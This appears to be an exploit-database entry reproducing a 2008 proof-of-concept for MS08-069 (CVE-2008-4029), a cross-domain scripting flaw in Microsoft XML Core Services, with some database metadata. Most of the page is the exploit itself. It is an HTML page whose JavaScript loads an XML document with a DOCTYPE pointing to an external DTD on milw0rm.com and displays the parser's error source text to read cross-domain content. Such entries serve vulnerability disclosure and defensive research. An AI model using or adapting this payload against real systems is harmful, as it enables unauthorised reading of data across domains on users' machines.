Lucene search

K
exploitpackJerome AthiasEXPLOITPACK:72B5B1CEA2A7DB5854BE3B9D84C1C45B
HistoryNov 23, 2008 - 12:00 a.m.

Microsoft XML Core Services DTD - Cross-Domain Scripting (MS08-069)

2008-11-2300:00:00
Jerome Athias
16

0.887 High

EPSS

Percentile

98.7%

Microsoft XML Core Services DTD - Cross-Domain Scripting (MS08-069)

<html>
<body>
KB955218 - CVE-2008-4029 - JA
<script type="text/javascript">
var dom = new ActiveXObject("Msxml2.DOMDocument.3.0");
dom.async = false;
var url = "http://www.milw0rm.com/forfun.dtd";
var xml = "<!DOCTYPE pwn SYSTEM '" + url + "'>";
if (dom.loadXML(xml) == 0)
{
	alert("Blue or Red Pill? " + dom.parseError.srcText);
}
</script>
</body>
</html>

# milw0rm.com [2008-11-23]

0.887 High

EPSS

Percentile

98.7%